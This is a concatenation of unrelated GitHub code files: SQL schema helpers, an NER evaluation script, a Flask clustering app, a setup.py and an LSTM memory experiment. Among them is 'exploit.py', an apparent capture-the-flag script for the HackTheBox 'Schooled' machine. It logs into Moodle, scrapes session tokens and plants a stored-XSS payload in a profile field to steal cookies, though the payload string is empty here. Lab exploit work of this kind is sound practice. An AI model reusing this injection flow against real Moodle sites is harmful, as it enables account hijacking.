CreateTableName(attributes)\n else:\n scheme = CreateSchemeJunction(attributes)\n print(scheme)\n tableName = CreateTableNameJunction(attributes)\n\n print(tableName)\n # CreateTable(tableName, scheme)\n ### Add () around scheme when creating table otherwise error\n #__TableInsert() does this automatically anyway ´, only use when testing\n\n insertScheme = CreateSchemeInsert(attributes)\n\n for j in range(1, len(matrix)):\n values = str()\n attribValues = GetAttribs(matrix[j][i])\n # hack\n if(len(attribValues[0]) < 1):\n break\n\n if(len(attribValues) == 1):\n values = \" VALUES(\" + \"'\" + attribValues[0] + \"')\"\n print(\"INSERT INTO \" + tableName + insertScheme + values)\n else:\n NUM_ATTRIBUTES = len(attributes) - 1\n numAdded = 0\n for k in range(1, len(attribValues)):\n values += \"'\" + attribValues[k] + \"'\" + \",\"\n numAdded += 1\n if(numAdded == NUM_ATTRIBUTES):\n numAdded = 0\n values = \" VALUES(\" + \"'\" + attribValues[0] + \"',\" + values\n values = values.removesuffix(\",\")\n values += \")\"\n print(\"INSERT INTO \" + tableName + insertScheme + values)\n values = str()\n \n\n\n\n\n\n \n\n\n\n\n\n\n\"\"\" schemas = list(str())\ntmpStr = str()\nfor i in range(0, NUM_ATTRIBUTES):\n if (i == 0):\n tmpStr += matrix[0][0] + \" VARCHAR(64) PRIMARY KEY,\"\n else:\n tmpStr += matrix[0][i] + \" VARCHAR(64),\"\nschemas.append(tmpStr.removesuffix(\",\"))\n\nfor i in range(NUM_ATTRIBUTES, len(matrix[0])):\n tmpStr = str()\n tmpStr += matrix[0][i] + \" VARCHAR(64) PRIMARY KEY\"\n schemas.append(tmpStr)\n tmpStr = str() # Reset string\n tmpStr += DoubleAttrib(matrix[0][0], matrix[0][i], \"64\")\n tmpStr += 
DoublePK(matrix[0][0], matrix[0][i])\n tmpStr += ForeginKeyCascade(matrix[0][0])\n if (i < NUM_ATTRIBUTES + NON_CASCADES):\n tmpStr += ForeginKey(matrix[0][i])\n else:\n tmpStr += ForeginKeyCascade(matrix[0][i])\n schemas.append(tmpStr.removesuffix(\", \"))\n\nprint(\"------------------------------------------\")\nfor schema in schemas:\n print(schema) \"\"\"\n\n \n#ON DELETE, ON CASCADE <<------ CHECK THIS OUT # https://www.javatpoint.com/mysql-on-delete-cascade #####\n\n'''SYNTAX FOR FOREIGN KEY'''\n# column CHAR(64), FOREIGN KEY(column) REFERENCES table(column-1)\n\n'''Syntax for composite key'''\n# column-1 CHAR(64), column-2 CHAR(64), PRIMARY KEY (column-1, column-2)\n\n'''Our table syntax should look like this: '''\n# title CHAR(64) PRIMARY KEY,year CHAR(64),publisher CHAR(64)\n# platform_name CHAR(64) PRIMARY KEY\n# title CHAR(64), platform_name CHAR(64), PRIMARY KEY(title, platform_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(platform_name) REFERENCES platform(platform_name)\n# genre_name CHAR(64) PRIMARY KEY\n# title CHAR(64), genre_name CHAR(64), PRIMARY KEY(title, genre_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(genre_name) REFERENCES genre(genre_name)\n# store_name CHAR(64) PRIMARY KEY\n# title CHAR(64), store_name CHAR(64), price VARCHAR(10), PRIMARY KEY(title, store_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(store_name) REFERENCES store(store_name)\n\n\n'''END RESULT SHOULD BE LIKE THIS (optional table names, if we change remember to change all occurences!!)'''\n# CREATE TABLE game_info (title CHAR(64) PRIMARY KEY,year CHAR(64),publisher CHAR(64))\n\n# CREATE TABLE platform (platform_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_platform (title CHAR(64), platform_name CHAR(64), PRIMARY KEY(title, platform_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(platform_name) REFERENCES platform(platform_name))\n\n# CREATE TABLE genre (genre_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_genre (title CHAR(64), genre_name CHAR(64), PRIMARY KEY(title, genre_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(genre_name) REFERENCES genre(genre_name))\n\n# CREATE TABLE store (store_name CHAR(64) PRIMARY KEY)\n# CREATE TABLE game_store (title CHAR(64), store_name CHAR(64), price VARCHAR(10), PRIMARY KEY(title, store_name), FOREIGN KEY(title) REFERENCES game_info(title), FOREIGN KEY(store_name) REFERENCES store(store_name) ON DELETE CASCADE)\n\n\n\n\n\n# Why not use title TEXT instead of CHAR(64)? \n# TEXT only occupies the actual lenght of the text + 2 bytes\n# CHAR size in bytes is number of char\n# VARCHAR size in bytes is number of chars used +1\n# Isn't it better to dynamically allocate memory instead?\n# CHAR allocates a set chunk?\n\n# if we use CHAR, Mysql pads the remainder of spaces that are not used\n# VARCHAR are not padded, stores only the lenght of the string + 1 or 2 bytes for a prefix\n# TEXT, mysql doesnt support text data types well. Can lead to creation of a temporary table\n# on disk instead of memory, which leads to significant performance penalties.\n'''https://blog.cpanel.com/varchar-vs-text-for-mysql-databases/'''","repo_name":"prevLanky/1DV503-programming-assignment-2","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17200179125","text":"'''\nEvaluates the performance of a CoNLL format annotated file. 
Also shows the errors that were found in the file.\nThe file should have three columns (token, true tag, predicted tag).\n\nUsage:\n conll_evaluate_results.py <conll_file_path> <output_results_path> [options]\n\nArguments:\n <conll_file_path> Annotated CoNLL file using the model\n <output_results_path> Output text file where to save the analysis\n\n --window=<window>
If equal to \"single\" print the single tokens that were misclassified. [default: single]\n If it is an int, show the previous and following n tokens around the error.\n --type_error= What type of errors to show. For ex., \"B-PER,O\" will show the errors when\n the true label was B-PER but the predicted label is O (default: None)\n'''\n\nimport pandas as pd\nfrom argopt import argopt\n\nfrom seqeval.metrics import classification_report, f1_score\n\nfrom src.results.confusion_matrix_pretty_print import print_confusion_matrix\n\n\ndef print_results(y_true, y_pred):\n classif_report = classification_report(y_true, y_pred)\n print(classif_report)\n\n fscore = f1_score(y_true, y_pred)\n print(f\"F-score (micro): {fscore:.2f}\")\n fscore_str = f\"F-score (micro): {fscore:.2f}\"\n\n labels = list(set(y_true))\n labels.pop(labels.index(\"O\"))\n labels = sorted(labels, key=lambda x: (x[2:], x[0])) + [\"O\"]\n\n cm = print_confusion_matrix(y_true=y_true, y_pred=y_pred,\n labels=labels,\n return_string=True)\n print(cm)\n\n return classif_report, fscore_str, cm\n\n\ndef print_errors(results_df: pd.DataFrame, type_error=None, window=\"single\", return_string=False):\n \"\"\"\n Show the errors found in the read CoNLL file\n :param results_df: Input CoNLL file to test\n :param type_error: Dict containing the types of errors to show: ex.: {\"true\": \"B-PER_NOM\", \"pred\": \"O\"}.\n Show all the errors by default\n :param window: If \"single\", show the single misclassified token, if an int, show the previous and next n tokens\n :return_string: If True, print AND return a string with the results\n :return:\n \"\"\"\n from io import StringIO\n import sys\n\n errors_string = StringIO()\n old_stdout = sys.stdout\n if return_string:\n errors_string = StringIO()\n sys.stdout = errors_string\n\n results_df = results_df.fillna(\"\")\n results_df.index = range(1, len(results_df) + 1)\n if type_error:\n errors_idx = results_df[(results_df[\"true_tag\"] == type_error[\"true\"]) &\n (results_df[\"pred_tag\"] == type_error[\"pred\"])].index\n\n else:\n errors_idx = results_df[results_df[\"pred_tag\"] != results_df[\"true_tag\"]].index\n\n if window == \"single\":\n final_df = results_df.loc[errors_idx]\n print(final_df.to_string())\n elif isinstance(window, int):\n lower_bound, upper_bound = (-1, -1)\n for idx in errors_idx:\n if lower_bound < idx < upper_bound:\n continue\n lower_bound = max(0, idx - window)\n upper_bound = min(errors_idx.max(), idx + window)\n window_df = results_df.loc[lower_bound:upper_bound, :]\n print(f\"Line {idx} of the CoNLL file:\", end=\"\\n\\t\")\n print(window_df, end=\"\\n\\n\")\n\n if return_string:\n sys.stdout = old_stdout\n return errors_string.getvalue()\n\n\ndef main(conll_file_path, output_results_path, type_error, window):\n # Load conll file\n results_df = pd.read_csv(conll_file_path, delim_whitespace=True, names=[\"token\", \"true_tag\", \"pred_tag\"],\n skip_blank_lines=False)\n y_true = results_df[\"true_tag\"].dropna().values.tolist()\n y_pred = results_df[\"pred_tag\"].dropna().values.tolist()\n results = print_results(y_true=y_true, y_pred=y_pred)\n print()\n errors = print_errors(results_df=results_df, type_error=type_error, window=window, return_string=True)\n print(errors)\n results_errors = list(results) + [errors]\n\n with open(output_results_path, \"w\") as outo:\n for info in results_errors:\n outo.write(str(info))\n outo.write(\"\\n\\n\")\n\n\nif __name__ == '__main__':\n parser = argopt(__doc__).parse_args()\n conll_file_path = parser.conll_file_path\n 
output_results_path = parser.output_results_path\n window = parser.window\n if window.isdigit():\n window = int(window)\n\n if parser.type_error:\n type_error = parser.type_error.split(\",\")\n type_error = {\"true\": type_error[0], \"pred\": type_error[1]}\n else:\n type_error = parser.type_error\n\n main(conll_file_path=conll_file_path,\n output_results_path=output_results_path, type_error=type_error,\n window=window)\n","repo_name":"etalab-ia/pseudo_conseil_etat","sub_path":"src/results/conll_evaluate_results.py","file_name":"conll_evaluate_results.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"14414388300","text":"# python3\n\nfrom flask import Flask, render_template, request\nfrom PIL import Image\nfrom sklearn import cluster as sk_cluster\nimport numpy as np\nimport random\nimport datetime\n\nnp.set_printoptions(threshold=np.nan)\n\napp = Flask(__name__, static_url_path = \"/images\", static_folder = \"images\")\n\nw, h = 6, 1024;\nx = 0\nsum_data = 0\nis_looping = {}\nrgb_im = {}\nim = {}\nlist_data = [[0 for x in range(w)] for y in range(h)] #list_data[[6]1024]\n\ncolors = [\"red\",\"green\",\"blue\",\"orange\",\"purple\",\"pink\",\"yellow\"]\n\nfor k in range(0,6):\n if k == 5:\n url = 'images/gb'+str(k+2)+'.GIF'\n else :\n url = 'images/gb'+str(k+1)+'.GIF'\n \n im[k] = Image.open(url)\n rgb_im[k] = im[k].convert('RGB')\n width, height = im[k].size\n\n# get pixel change to grayscale then enter to array\nfor i in range(0,width):\n for j in range(0,height):\n for k in range(0,6):\n pixel_im = rgb_im[k].getpixel((i,j))\n red_im = pixel_im[0]\n green_im = pixel_im[1]\n blue_im = pixel_im[2]\n gray_im = (red_im + green_im + blue_im)/3\n\n list_data[x][k] = gray_im\n\n is_looping[x] = True\n x = x + 1\n\n@app.route('/')\ndef main():\n return render_template('index.html')\n\n@app.route('/process', methods=['GET', 'POST'])\ndef process():\n if request.method =='POST':\n cluster = request.form['cluster']\n cluster_tmp = []\n x = 0\n\n result = sk_cluster.AgglomerativeClustering(n_clusters=int(cluster),linkage='complete').fit_predict(list_data)\n\n print(result)\n\n # for x in range(0,width*height):\n # for y in range(0,int(cluster)):\n # if result[x] == y:\n # cluster_tmp.append([])\n # cluster_tmp[y].append(x)\n\n # for x in range(0,int(cluster)):\n # print('Cluser '+str(x)+' : '+str(cluster_tmp[x]))\n\n # make image\n img = Image.new('RGB', [32,32], 0x000000)\n # loop = 0\n for i in range(0,width):\n for j in range(0,height):\n if result[x] == 0:\n img.putpixel((i,j),(255,0,0))\n elif result[x] == 1:\n img.putpixel((i,j),(0,255,0))\n elif result[x] == 2:\n img.putpixel((i,j),(0,0,255))\n elif result[x] == 3:\n img.putpixel((i,j),(255,255,0))\n elif result[x] == 4:\n img.putpixel((i,j),(255,0,255))\n elif result[x] == 5:\n img.putpixel((i,j),(0,255,255))\n elif result[x] == 6:\n img.putpixel((i,j),(0,0,0))\n else:\n img.putpixel((i,j),(255,255,255))\n\n x += 1\n\n now = datetime.datetime.now()\n img.save('images/'+str(now)+'.jpg')\n # img.show()\n url_image = str(now)+'.jpg'\n\n return render_template('hasil.html', cluster=cluster, url_image=url_image)\n\n else:\n return \"ok\"\n\n# run app\nif __name__ == \"__main__\":\n app.run()","repo_name":"adiputra17/multiband-image-clustering-py","sub_path":"app_lib.py","file_name":"app_lib.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"22496982931","text":"from setuptools import setup\n\npackage_name = 'turtlesim'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='luana',\n maintainer_email='luana@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"draw_exe = turtlesim.draw:main\"\n ],\n },\n)","repo_name":"luanaparra/modulo6_ponderados","sub_path":"semana1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36786421586","text":"#!/usr/bin/python3\n# Creator: brutuspt\n\nimport urllib.parse\nimport requests\nimport argparse\nimport os, sys\nimport base64\nfrom bs4 import BeautifulSoup\n\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument(\"-t\", \"--target\", help=\"Target Domain Name/IP\", required=True)\nparser.add_argument(\"-i\", \"--IP\", help=\"Attacker IP (Where to catch the rev shell)\", required=True)\nparser.add_argument(\"-p\", \"--port\", help=\"Attacker Port (Where to catch the rev shell)\", required=True)\nparser.add_argument(\"-U\", \"--username\", help=\"Username\", required=True)\nparser.add_argument(\"-P\", \"--password\", help=\"Password\", required=True)\n#parser.add_argument(\"-wp\", \"--webport\", help=\"Attacker Web Server Port (Where to server the payloads)\", required=True)\n\n\nargs = parser.parse_args()\n\ns = requests.Session()\n\"\"\"\ndef register (target, username, password):\n # Registers the user in the Moodle platform\n \n url = \"http://%s/moodle/login/signup.php\" % target\n \n headers = { \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\" }\n data = { \n \"sesskey\": \"LgTBsIGFGU\",\n \"_qf__login_signup_form\": 1,\n \"mform_isexpanded_id_createuserandpass\": 1,\n \"mform_isexpanded_id_supplyinfo\": 1, \n \"username\" : username,\n \"password\" : password, \n \"email\" : str(username)+\"@student.schooled.htb\",\n \"email2\" : str(username)+\"@student.schooled.htb\", \n \"firstname\": \"brutuspt\",\n \"lastname\": \"brutuspt\",\n \"city\": \"Lisboa\",\n \"contry\": \"PT\",\n \"submitbutton\" : \"Create my new account\" \n }\n \n proxies = { \"http\" : \"127.0.0.1:8080\" }\n \n r = s.post(url, headers=headers, data=data, proxies=proxies)\n \n if \"Please click on the link below to confirm your new account.\" in r.text:\n print(\"[INFO] \" + str(username) + \" was successfully registered in Moodle!\")\n else:\n print(\"[ERROR] Registration Failed!\")\n sys.exit(1)\n \n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n for data in soup.find_all('input'):\n if str(username) in data:\n token = data.get(\"value\")\n print(token)\n\"\"\"\n\ndef login(target, username, password):\n #login function\n \n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\" }\n url = \"http://%s/moodle/login/index.php\" % target\n \n print(\"[INFO] Trying to grab the logintoken first...\")\n r = s.get(url, proxies=proxies)\n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n login_token = soup.find(\"input\", {\"name\":\"logintoken\",\"type\": 
\"hidden\"}).get(\"value\")\n print(\"[SUCCESS] Grabbed!! Login Token: \" + str(login_token))\n \n print(\"[INFO] Using the login token to login into Mooddle...\")\n data = { \"logintoken\" : str(login_token), \"username\": username, \"password\" : password }\n \n r = s.post(url, data=data, headers=headers) # proxies=proxies\n if \"Dashboard\" in r.text:\n print(\"[INFO] Login using the \" + str(username) + \" user was successful!\")\n else:\n print(\"[ERROR] Login Failed!\")\n sys.exit(1)\n \n print(\"[INFO] Trying to grab the sesskey...\")\n\n # grabbing the sesskey...pain in the ass\n soup = BeautifulSoup(r.text, 'html.parser')\n sesskey = str(soup(\"script\")[1]).split(\"sesskey\")[1][3:13]\n print(\"[SUCCESS] sesskey extracted successfully: \" + str(sesskey))\n return sesskey\n\n\ndef enroll_maffs(target, sesskey):\n # This function will be responsible for signing my user into the Mathematics class\n \n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\",\n \"Origin\": \"http://\"+ str(target),\n \"Referer\": \"http://\"+ str(target) + \"/moodle/enrol/index.php?id=5\",\n \"Connection\": \"close\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"DNT\": \"1\",\n \"Sec-GPC\": \"1\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\"\n\n }\n url = \"http://%s/moodle/enrol/index.php\" % target\n\n print(\"[INFO] Requesting access to the Maffs class...\")\n\n data = { \"id\" : \"5\", \"instance\": \"12\", \"sesskey\": sesskey, \"_qf__12_enrol_self_enrol_form\" : \"1\", \"mform_isexpanded_id_selfheader\" : \"1\", \"submitbutton\" : \"Enrol me\"}\n \n r = s.post(url, data=data, headers=headers, allow_redirects=True) # proxies=proxies\n #print(r.text)\n \n if \"You are enrolled in the course.\" in r.text:\n print(\"[SUCCESS] The user was successfully enrolled into the Maffs class\")\n else:\n print(\"[ERROR] It was not possible to enroll the user!\")\n \n\n\ndef exploit_xss(target, username, sesskey, ip, port):\n # Create the XSS payload\n # POST the payload\n # Wait for the target to trigger it\n # Retrieve the cookie\n\n payload = \"\"\n\n #proxies = { \"http\" : \"127.0.0.1:8080\" }\n headers = { \n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\",\n \"Origin\": \"http://\"+ str(target),\n \"Referer\": \"http://moodle.schooled.htb/moodle/user/edit.php?id=28&returnto=profile\",\n \"Connection\": \"close\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"DNT\": \"1\",\n \"Sec-GPC\": \"1\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\"\n\n }\n\n \n url = \"http://%s/moodle/user/edit.php\" % target\n\n print(\"[INFO] Editing the user profile, more specifically, the moodlenetprofile parameter\")\n\n data = \"course=1&id=28&returnto=profile&id=28&course=1&mform_isexpanded_id_moodle_picture=1&sesskey=\" + sesskey + \"&_qf__user_edit_form=1&mform_isexpanded_id_moodle=1&mform_isexpanded_id_moodle_additional_names=0&mform_isexpanded_id_moodle_interests=0&mform_isexpanded_id_moodle_optional=0&firstname=brutuspt&lastname=lal&email=brutuspt%40student.schooled.htb&maildisplay=2&moodlenetprofile=\" + urllib.parse.quote(payload) + 
\"&city=&country=PT&timezone=99&description_editor%5Btext%5D=&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D=253209954&imagefile=777744395&imagealt=&firstnamephonetic=&lastnamephonetic=&middlename=&alternatename=&interests=_qf__force_multiselect_submission&url=&icq=&skype=&aim=&yahoo=&msn=&idnumber=&institution=&department=&phone1=&phone2=&address=&submitbutton=Update+profile\"\n \n print(payload)\n \n r = s.post(url, data=data, headers=headers, allow_redirects=True) # proxies=proxies\n #print(r.text)\n \n if \"MoodleNet profile\" in r.text:\n print(\"[SUCCESS] We have successfully dropped our XSS payload into the moodlenetprofile area!\")\n else:\n print(\"[ERROR] Something went wrong, we did not manage to drop our XSS payload!\")\n \n\n\n\"\"\"\ndef create_server():\n # HTTP Server receiving our stolen cookies \n handler = http.server.SimpleHTTPRequestHandler\n httpd = socketserver.TCPServer((args.IP, int(args.webport)), handler)\n print(\"Serving our PHP payload here: http://%s:%s\" % (args.IP, args.webport))\n httpd.serve_forever()\n\nthreading.Thread(target=create_server).start()\n\"\"\"\n\ndef main():\n if args.target == \"moodle.schooled.htb\":\n #register(args.target, args.username, args.password)\n sesskey = login(args.target, args.username, args.password)\n enroll_maffs(args.target, sesskey)\n exploit_xss(args.target, args.username, sesskey, args.IP, args.port)\n\n else:\n print(\"[ERROR] Please use the subdomain moodle.schooled.htb as the target\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"brutuspt/0click_HTB","sub_path":"Medium/Schooled/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"68"} +{"seq_id":"13674732446","text":"# https://keras.io/examples/nlp/lstm_seq2seq/\n\nimport numpy as np\nimport argparse\nimport tensorflow as tf\nfrom tensorflow import keras\n# from tensorflow.keras.callbacks import EarlyStopping\nfrom dataset.synthetic_dataset_encoder_mlp import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import balanced_accuracy_score, recall_score\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import BatchNormalization, Dropout, Activation\n# from keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras import layers\nimport pandas as pd\nimport pickle\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import Callback\n\ndef warn(*args, **kwargs):\n pass\nimport warnings\nwarnings.warn = warn\n\n\n# transformer block implementations\nclass TransformerBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(TransformerBlock, self).__init__()\n self.att = layers.MultiHeadAttention(num_heads=num_heads,\n key_dim=embed_dim)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim), ]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, 
inputs, training):\n attn_output = self.att(inputs, inputs)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(inputs + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out1 + ffn_output)\n\n\nclass TokenAndPositionEmbedding(layers.Layer):\n def __init__(self, maxlen, vocab_size, embed_dim, memory_model):\n super(TokenAndPositionEmbedding, self).__init__()\n self.memory_model = memory_model\n if (self.memory_model != \"transformer_no_orthonormal\"):\n self.maxlen = maxlen\n # add encoding only when orthonormal encoding is not used\n if (self.memory_model == \"transformer_no_orthonormal\"):\n self.token_emb = layers.Embedding(input_dim=vocab_size,\n output_dim=embed_dim)\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\n\n def call(self, x):\n if (self.memory_model == \"transformer_no_orthonormal\"):\n maxlen = tf.shape(x)[-1]\n if (self.memory_model != \"transformer_no_orthonormal\"):\n positions = tf.range(start=0, limit=self.maxlen, delta=1)\n else:\n positions = tf.range(start=0, limit=maxlen, delta=1)\n positions = self.pos_emb(positions)\n if (self.memory_model == \"transformer_no_orthonormal\"):\n x = self.token_emb(x)\n return x + positions\n\n\ndef load_dataset(args):\n # df = pd.read_csv('/workspace/memory_clean/Memory/memory_retention_raw.csv',\n # usecols=['index', 'seq_len', 'seq', 'rep_token_first_pos',\n # 'query_token', 'target_val'])\n if args.debug == 1:\n df = pd.read_csv(args.root_location + \"memory_retention_raw_26.csv\",\n usecols=['index', 'seq_len', 'seq',\n 'rep_token_first_pos',\n 'query_token', 'target_val'])\n else:\n df = pd.read_csv(args.root_location + \"memory_retention_raw.csv\",\n usecols=['index', 'seq_len', 'seq',\n 'rep_token_first_pos',\n 'query_token', 'target_val'])\n print(df.head())\n len_seq = df['seq_len'].to_numpy()\n raw_sequence = df['seq'].to_numpy()\n rep_token_first_pos = df['rep_token_first_pos'].to_numpy()\n token_rep = df['query_token'].to_numpy()\n target_y = df['target_val'].to_numpy()\n\n # read the pickle file\n if args.debug == 1:\n f = open(args.root_location + 'input_data_26.pkl', 'rb')\n orth_vectors = np.load(\n args.root_location + 'orthonormal_vectors_26.npy')\n else:\n f = open(args.root_location + 'input_data.pkl', 'rb')\n orth_vectors = np.load(\n args.root_location + 'orthonormal_vectors_512.npy')\n x = pickle.load(f)\n f.close()\n ip_sequence = np.load(args.root_location + 'raw_sequence.npy',\n allow_pickle=True)\n num_samples = len(x)\n raw_sample_length = len(raw_sequence)\n print(\"Number of samples {}\".format(num_samples))\n print(\"Number of samples in raw sequence {}\".format(raw_sample_length))\n return x, num_samples, len_seq, token_rep, rep_token_first_pos, \\\n ip_sequence, target_y, orth_vectors\n\n\n\"\"\"\nget the token id from the from the sequence, required for transformers\n\"\"\"\n\n\ndef orthonormal_decode(dataset, orthonormal_vectors):\n seq_dataset = []\n for sequence in dataset:\n seq = []\n for token in sequence:\n a = np.matmul(token, orthonormal_vectors.T)\n idx = np.isclose(a, 1)\n id = np.where(idx == True)\n if np.size(id) == 0:\n token_id = 0\n else:\n token_id = id[0][0]\n # do not append eos\n if (token_id == 511):\n break\n seq.append(token_id)\n seq_dataset.append(seq)\n\n return seq_dataset\n\n\n\"\"\"\nThis function parses and pads the data\n\"\"\"\n\n\ndef process_data(max_seq_len, latent_dim, padding, memory_model, num_samples, x,\n 
raw_sequence):\n # separate out the input to the encoder and the mlp\n # mlp is fed the last one hot encoded input\n x_mlp = [0] * num_samples\n x_encoder = [0] * num_samples\n\n for iter, seq in enumerate(x):\n # seq[-1] - eos seq[-2] - query token seq[0:-2] - seq\n x_mlp[iter] = seq[-2]\n # all but the last one hot encoded sequence\n x_encoder[iter] = seq[0:-2]\n # eos\n x_encoder[iter].append(seq[-1])\n\n # seq len + 1 for alphabet + eos as orthonormal vectors are created with eos\n # max size of seq len is not max seq len - 1 for the actual sequence + 1 for eos\n encoder_input_data = np.zeros((num_samples, max_seq_len,\n latent_dim * 2), dtype=\"float32\")\n\n mlp_input_data = np.zeros((num_samples, latent_dim * 2), dtype=\"float32\")\n\n if padding == 'pre_padding':\n print(\"The shape of the encoder data is: \" + str(\n encoder_input_data.shape))\n for i in range(num_samples):\n seq_len = len(x_encoder[i])\n\n for seq in range(seq_len):\n # fill the elements in encoder_input_data in the reverse order,\n # this ensures that zero padding is done before the sequence\n encoder_input_data[i, max_seq_len - seq_len + seq] = \\\n x_encoder[i][seq]\n mlp_input_data[i] = x_mlp[i]\n elif padding == 'post_padding':\n\n for i in range(num_samples):\n seq_len = len(x_encoder[i])\n for seq in range(seq_len):\n encoder_input_data[i, seq] = x_encoder[i][seq]\n mlp_input_data[i] = x_mlp[i]\n\n if memory_model == \"transformer_no_orthonormal\":\n # remove the query token - the last token in raw_sequence\n sequence_raw = []\n for seq in raw_sequence:\n sequence_raw.append(seq[:-1])\n raw_sequence_padded = keras.preprocessing.sequence.pad_sequences(\n sequence_raw, maxlen=max_seq_len - 1, value=0)\n else:\n raw_sequence_padded = raw_sequence\n\n return encoder_input_data, mlp_input_data, raw_sequence_padded\n\n\ndef define_nn_model(max_seq_len, memory_model, latent_dim, raw_seq_train,\n raw_seq_val):\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n if memory_model == \"lstm\":\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n \"\"\"\n # encoder = Sequential()\n dense_layer = Sequential()\n encoder = keras.layers.LSTM(128, return_state=True)\n # encoder.add(keras.layers.Dense(512))\n encoder_outputs, state_h, state_c = encoder(main_sequence)\n # state_h, state_c = encoder(main_sequence)\n # We discard `encoder_outputs` and only keep the states.\n encoder_states = tf.concat((state_h, state_c), 1)\n dense_layer.add(keras.layers.Dense(768))\n dense_layer.add(keras.layers.Dense(512))\n encoder_states = dense_layer(encoder_states)\n \"\"\"\n encoder_outputs, state_h, state_c = keras.layers.LSTM(240, return_state=True)(main_sequence)\n encoder_states = tf.concat((state_h, state_c), 1)\n #encoder_states = keras.layers.Dense(768)(encoder_states)\n encoder_states = keras.layers.Dense(512)(encoder_states)\n\n\n lr = 0.0013378606854350151\n print(\"Encoder chosen is LSTM\")\n elif memory_model == \"RNN\":\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n \"\"\"\n encoder = Sequential()\n encoder.add(keras.layers.SimpleRNN(256))\n encoder.add(keras.layers.Dense(1024, activation='relu'))\n encoder.add(keras.layers.Dense(512))\n encoder_output = encoder(main_sequence)\n 
